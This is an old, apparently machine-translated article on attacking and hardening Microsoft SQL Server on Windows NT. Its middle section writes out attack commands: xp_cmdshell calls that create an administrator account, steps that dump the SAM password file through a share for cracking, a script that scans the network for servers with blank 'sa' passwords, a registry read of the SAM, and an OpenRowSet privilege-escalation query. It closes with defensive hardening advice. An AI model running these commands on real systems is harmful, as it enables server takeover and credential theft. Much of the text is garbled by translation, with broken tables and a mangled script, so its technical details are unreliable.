There are currently many ways to invade the NT server, such as the use of IIS vulnerabilities, but everyone does not know that there is no, in fact, the example of the SQL database server associated with the NT server is also a very proportional means. You can see a news report below: http://www.vnunet.com/news/1110938. Herbless intrusted sites, such as the Legoland.co.uk site is destroyed by the invasion of the SQL server. So the protection of SQL servers is not less, here I organize some vulnerabilities for everyone to refer, laugh, laugh. -------------------------------------------------- -------------- Let's first take a look at the network protocol library supported by SQL Services: ---------------------- ------------------------------------------ | SQL Server Network Protocol Libraries | -------------------------------------------------- ------------- | Protocol Library | Possible vulnerabilities | Whether encryption | ----------------------- --------------------------------------- | Named pipes | - Use NT SMB port ( TCP139, UDP137, | No | | (Amped Dip) | 138) to communicate, these can be controlled by the firewall, but if the internal network can | | | | Free access is also a small defect | | | | - User name, password and data are not added | | | | Transport, anyone can come through Sniffer | | | | Capture. | | - ------------------------------------------------------------------------------ ---------------- | IP Sockets | - Default Status Open 1433, you can use the | No | | | Scanner to view this port. | | | | Can be intercepted by Sniffer. | | - ------------------------------------------------------------------------------ ---------------- | Multi-Protocol | - The client needs to support NT RPCS; in different | yes | | | Type environments may cause problems. | | | - By default, use TCP random ports, but | | | | firewall perform port map fixed implementation (see KB Q164667). | | | | - Need to note if the encryption option is selected, default | | | "Do not select this option.
| | - ------------------------------------------------------------------------------ ---------------- | NWLINK | - There is a danger of intercepting data by Sniffer | No | ----------------- --------------------------------------------- | AppleTalk (ADSP) Danger of intercepting data by Sniffer | No | ----------------------------------- --------------------------- | Banyan Vines | - There is a danger of intercepting data by Sniffer | No | ------- -------------------------------------------------- ------ General recommended use is: If you can use Named Pipes or Multi-Protocol on Integrated (NT) Security, you use these protocol libraries, if possible, try to use Multi-Protocol and enable Encryption option. If you can't use it above, use the IP Sockets protocol and change its default port and check the system to ensure that there is no SNIFFER. Also, consider using a web service or COM component as an application's Business Object Layer and uses a secure channel in the intermediate layer and SQL service. There are a lot of third-party products to encrypt this communication.
-------------------------------------------------- --------------------- Next, how do you work in SQL Server?
Safety mode defines some SQL Server how to authenticate users to use them, please see the SQL Server 6.5 security mode and some description and distinction between SQL Server 7.0.
-------------------------------------------------- ----------------- | Security mode | SQL Server 6.5 | SQL Server 7.0 Change Place | ------------------- ------------------------------------------------ | STANDARD | - Login Definition in SQL Server | - Separate Standard Mode in SQL Server | | Standard Mode | and give a password. | Not used. | | | | - SQL Server Login Account and | | | | | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ------------------------------------- | Integrated | - Use the security manager SQL account | - Be here, "Windows NT Only" | | Integrated Mode | | Mode. | | | User is connected to SQL Server | - only works under the NT system, in Win9x is not | | | No specific separation login and | support. | | | | Password. | | | | - Password Never stored in the application | - Can be directly incorporated into the NT group to facilitate | | | Not in plaintext in the network | (Note There is a Builtin group in | | |. | | | | | -Sql server can authenticate users with NT | | | | | | | | | | You can use the expiration of the account. | | | | - Need Named Pipe or Multi- | | | | Protocol library. | | - ------------------------------------------------------------------------------ ---------------------- | Mixed | - Provide some of the way to the above way | - Become SQL Server and Windows NT | | Mixing Method | Things are customers | modes. | | | NT cannot establish a trusted connection. | - Try to use WINDOW NT Only mode | ------------------------------------- ---------------------------- login is just the first step, once the user logs in, the user must access the independent database, The above setup must have an expression to give each database for users to the user in the sysusers table. So, please pay attention to whether there is a "guest" account in your database and to ensure that you will access your database when you don't pay attention.
For details, please refer to Microsoft's site:
http://www.microsoft.com/technet/sql/technote/secure.asp
-------------------------------------------------- -------------------
Some security issues in SQL Server:
There is a "SA" account, the password is empty, and this password is a member of the SQL Server security module, we can make a command operation through the XP_Cmdshell Stored Procedure, such as:
XP_cmdshell "Net User Testuser Ugothacked / Add" Then: XP_cmdshell "Net localGroup Administrators Testuser / add" such an attacker has successfully added a user on SQL Server.
Of course, the distance is usually required to have 1433 ports, connect through the MySQL client.
Of course, you can also use: XP_cmdshell "rdisk / s" method, so that information is rebuilt in the / WinNT / RePair directory without prompting users. The attacker can then create an SMB connection to a shared or establish a connection: XP_cmdshell "net share getsam = c: / winnt / repair" uses sharing to get this file, then use L0PHTCRACK to run. If the SMB port is controlled by the firewall, or if the attacker can copy Sam._ file to the web directory for anonymous browser.
If people don't open IIS, why don't you use TFTP :). OK, through this controlled SQL Server server, attackers can find other machines to expand the results, below is a SQL script to list the network Other SQL Server exists in an empty account "SA": -------------------------------------- ---------------------------------- Create Temp Table To StoreRated Servers Set NoCount On Create Table #Tem (ShellDump varchar (255)) INSERT #temp EXEC xp_cmdshell "osql -L" DECLARE @current_server varchar (255), @conn_string varchar (255) DECLARE sql_cursor CURSOR FOR SELECT * FROM #temp OPEN sql_cursor FETCH NEXT FROM sql_cursor INTO @current_server - Loop through potential targets and check for null sa accounts - If target is vulnerable, version information will be displayedWHILE @@ FETCH_STATUS = 0 BEGIN If @current_server <> "Servers:" BEGIN SELECT @current_server = rtrim (ltrim (@current_server)) SELECT @Conn_String = "EXEC XP_CMDSHELL" "OSQL -S" @current_server "-usa -p -q" Select @@ version "" "" Print "Attempting Connection TO Server: " @current_server execute" ==================================== ================================== "end fetch next from sql_cursor @ @
Current_server end --clean up close sql_cursor deallocate sql_cursordrop table #Temp ------------------------------------------------------------------------------------------------------ --------------------------------, of course, some people may also close XP_cmdshell extended storedure (extension stored procedure), we You can also use the following method: XP_regread "HKEY_LOCAL_MACHINE", "Security / Sam / Domains / Account", "f" If the MSSQLServer service is running under the local system account, and if you do not install syskey on the system, you can return to registration The encrypted password or SID is in the table. -------------------------------------------------- -------------------- Another vulnerability is the improvement of the rights of Adhoc Heterogen Queries. Please see the following Microsoft Description: http://www.microsoft. COM / TECHNET / Security / BULLETIN / FQ00-014.ASP About the above vulnerability, you can use the following XploIT to get the right to improve: select * from OpenRowSet ("SQLOLEDB", "Trusted_Connection = YES; DATA SOURCE = MyServer", " Set fmtonly off execute master..xp_cmdshell "DIR C: /" ") This is a kind of favorite command that can do other commands, think it is. -------------------------------------------------- -------------------- Another is the most recent vulnerability: Extended storedure Parameter Parsing vulnerabilities, detailed information, is introduced in this URL : Http://www.microsoft.com/technet/security/bulletin/ms00-092.asp. The main problem is to provide an API function SRV_PARAMINFO () in the MSD. It is used to extend the deployment parameters when the stored procedure is called, such as: Exec
4, XP_DISPLAYPARAMSTMT (XPREPL.DLL) XP_ENUMRESULTSET (XPREPL.DL) XP_SHOWCOLV (XPREPL.DLL) XP_UPDATECOLVBM (XPREPL.DLL) Ges to the first parameter will cause illegal operation and override the return of the exception handler address. Here you tell you a skillful thing. If you want to know that these extension stored procedures call the DLL file, you can do the following, such as: select O.Name, C.Text from dbo.syscomments C, DBo.sysObjects o Where C.ID = o.ID and o.name = "xp_peekqueue" This can get the DLL of calling this extended stored procedure. If Microsoft does not have patch, you temporarily change this DLL file, of course, some DLL files Call a few extended stored procedures, can not blindly change, otherwise other can not be used, you need to use the following to know that the DLL calls those extended stored procedures: select O.Name, C.Text from dbo.syscomments C, Dbo. Sysobjects o where c.id = o.ID and c.text = "xpqueue.dll" Fortunately, Microsoft has made patch, you can find it below, don't have one to find a DLL program, huh: http: // support. Microsoft.com/support/sql/xp_security.asp This vulnerability @stake discovers and provides the test code, you can find: http://www.atstake.com/research/advisories/2000/sqladv2-poc.c -------------------------------------------------- ------------------ OK, of course SQL Server also has some other vulnerabilities, relatively slight, as ISS discovery administrators login ID stored in the registry, its encryption The method is relatively simple, it is easy to get, please see: http://xForce.iss.net/alerts/advise45.php3. Everyone can find it else. -------------------------------------------------- ------------------ Some Security Suggestions on SQL Server Systems: - To ensure the latest security patches, as follows: Windows NT 4.0 - Service Pack 6a SQL Server 6.5 - Service Pack 5a SQL Server 7.0 - Service Pack 2. (Various HotFixes - Check http://www.microsoft.com/download) SQL Server 2000 - HotFix S80233i.exe (Intel) Of course, everyone should pay close attention to Microsoft's security announcement. - Do not use port 1433 in IP sockets, if you use Multi-Protocol, please modify the port.
- Do not embed the "SA" password into any application such as VB / Delphi Apps, or in a global.asa file, because "sa" is a default password for SQL Server, its permissions are similar to the management in the Windows NT system Account, and the password is empty. - Change the password of the "SA" and "ProBe" account. - Ensure that SQL Server's error is recorded on the NTFS system. - If you don't need XP_cmdshell (Use sp_dropextendedproc "xp_cmdshell") Do not leave the XP_CMDSHELL Extended Stored Proc (Extension)
In the window, enter any isql: use master sp_dropextendedproc "xp_cmdshell" - discard unwanted OLE automatic storage procedure, of course, certain features of Enterprise Manager will also not be used in these processes include the following: Sp_OACreate Sp_OADestroy Sp_OAGetErrorInfo Sp_OAGetPropertySp_OAMethod Sp_OASetProperty Sp_OAStop - removed the process does not require access to the registry, as follows: Xp_regaddmultistringXp_regdeletekey Xp_regdeletevalue Xp_regenumvalues xp_regread Xp_regremovemultistring Xp_regwrite - remove other system stored procedures, if you think you think you have the threat, of course, Drop these processes to be careful, you can test on the test machine to ensure your normal system to complete the work, these processes include: sp_bindsession sp_cursor sp_cursorclose sp_cursorfetch sp_cursoropen sp_cursoroption sp_getbindtoken sp_GetMBCSCharLen sp_IsMBCSLeadByte sp_OACreate sp_OADestroy sp_OAGetErrorInfo sp_OAGetProperty sp_OAMethod sp_OASetProperty sp_OAStop sp_replcmds sp_replcounters sp_repldone sp_replflush sp_replstatus sp_repltrans sp_sdidebug xp_availablemedia xp_cmdshell xp_deletemail xp_dirtree xp_dropwebtask xp_dsninfo xp_enumdsn xp_enumerrorlogs xp_enumgroups xp_enumqueuedtasks xp_eventlog xp_findnextmsg xp_fixeddrives x p_getfiledetails xp_getnetname xp_grantlogin xp_logevent xp_loginconfig xp_logininfo xp_makewebtask xp_msver xp_perfend xp_perfmonitor xp_perfsample xp_perfstart xp_readerrorlog xp_readmail xp_revokelogin xp_runwebtask xp_schedulersignal xp_sendmail xp_servicecontrol xp_snmp_getstate xp_snmp_raisetrap xp_sprintf xp_sqlinventory xp_sqlregister xp_sqltrace xp_sscanf xp_startmail xp_stopmail xp_subdirs xp_unc_to_drive - removing the guest user database. - Turn off SQL Mail compatibility to prevent some Trojan viruses. - Set a task handler to schedule the following program: FINDSTR / C: "Login Faled" /msql7/log/*.* "is redirected to other files or mail to the administrator mailbox.
